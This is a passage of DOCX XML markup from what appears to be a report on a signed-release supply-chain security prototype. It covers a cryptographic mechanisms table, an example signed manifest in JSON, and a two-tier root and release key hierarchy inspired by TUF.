          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Integrity / fingerprint</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Ed25519</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3288"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Artifact, manifest and trust-policy signatures</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3061"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Authenticity, integrity, non-repudiation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>TLS 1.3 (ECDHE + AES-GCM)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3288"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Registry download</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3061"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Channel confidentiality, integrity, server authentication</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>PKI: pinned root key → release keys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3288"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Trust establishment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3061"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Which signers are trusted</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>AES-256 (encrypted PKCS#8)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3288"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Private keys at rest (prototype)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3061"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Key confidentiality (HSM/KMS in production)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:trPr>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>HMAC-SHA1 TOTP (RFC 6238)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3288"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>MFA for release signing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3061"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Second authentication factor</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val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">To avoid common misconceptions, the design does </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>not</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> claim that hashing provides authentication, that TLS alone prevents malicious vendor artifacts, or that encrypting an artifact would prove who produced it. AES is used only where confidentiality is needed: protecting stored keys.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.5 Signed Manifest</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>The manifest binds every security-relevant fact about a release under one signature. The example below is produced by the prototype (signatures and provenance shortened):</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w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  "payload_type": "application/vnd.sscs.manifest.v1+json",</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  "manifest": {</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    "artifact": "secure-uploader",        "version": "1.0.0",</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    "filename": "secure-uploader-1.0.0.sh", "size": 1254,</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    "sha256": "bdfe8346562373e400cea24d3b130c8a4e3b44969da134b55ad0e7ad107c04bb",</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    "algorithm": "SHA-256",               "signature_algorithm": "Ed25519",</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    "signer": "Vendor Release Server",    "key_id": "ed25519:a12990cfe21cc2f0",</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    "timestamp": "2026-09-25T18:02:33Z",</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    "artifact_signature": "K1wmdYPKOL...",</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    "provenance": { "source_repository": "...", "commit_id": "...", "build_id": "...",</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "builder_identity": "vendor-secure-builder-01", "dependencies": [...],</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">                    "security_tests": {"passed": true, ...}, "artifact_sha256": "bdfe83..." },</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">    "provenance_sha256": "..."</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  },</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t xml:space="preserve">  "signatures": [ { "key_id": "ed25519:a12990cfe21cc2f0", "sig": "kC97VWun..." } ]</w:t>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
          <w:sz w:val="17"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Because the signature covers the whole manifest, an attacker cannot change the hash, relabel an old version as new, swap the provenance, or claim a different key without invalidating it. The manifest therefore improves </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>traceability</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (each deployed binary maps to exactly one build, commit, builder, key and time) and </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>verification</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (all checks are driven by one authenticated document).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
        <w:t>5.6 Key Management</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="40" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
            <wp:extent cx="5760000" cy="1111147"/>
            <wp:docPr id="5" name="Picture 5"/>
            <wp:cNvGraphicFramePr>
              <a:graphicFrameLocks noChangeAspect="1"/>
            </wp:cNvGraphicFramePr>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="key_management.png"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5760000" cy="1111147"/>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5.3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Key-management design</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0" w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>two-tier hierarchy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, inspired by The Update Framework (TUF) [12], separates long-term trust from day-to-day signing. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>root key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> is offline in production and signs only the </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:i/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>trust policy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Customers pin its public key once. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>release keys</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> are online Ed25519 keys used by the signing service. The trust policy lists each release public key with its status, the revoked artifact versions and the minimum acceptable version. It carries a version number and a 30-day expiry and is signed by the root key. Management follows NIST SP 800-57 guidance [8].</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:after="80" w:before="120" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:b/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">Table 5.3: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
          <w:i/>
          <w:sz w:val="21"/>
        </w:rPr>
        <w:t>Key-management functions</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLayout w:type="fixed"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblLayout w:type="fixed"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1927"/>
        <w:gridCol w:w="4422"/>
        <w:gridCol w:w="2608"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader w:val="true"/>
          <w:cantSplit/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1928"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4422"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Implementation in the prototype</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
            <w:shd w:val="clear" w:color="auto" w:fill="D9E2F3"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Production equivalent</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Key generation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4422"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>Ed25519PrivateKey.generate()</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> (OS CSPRNG); key_id = </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>ed25519:</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t xml:space="preserve"> + first 16 hex of SHA-256(public key)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2608"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>Generated inside HSM / cloud KMS</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Private-key protection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4422"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="20" w:before="0" w:line="252" w:lineRule="auto"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
                <w:sz w:val="19"/>
              </w:rPr>
              <w:t>PKCS#8 encrypted with AES-256 under a passphrase (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:eastAsia="Courier New"/>
                <w:b w:val="0"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>SSCS_KEY_PASSPHRASE</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman"/>
                <w:b w:val="0"/>
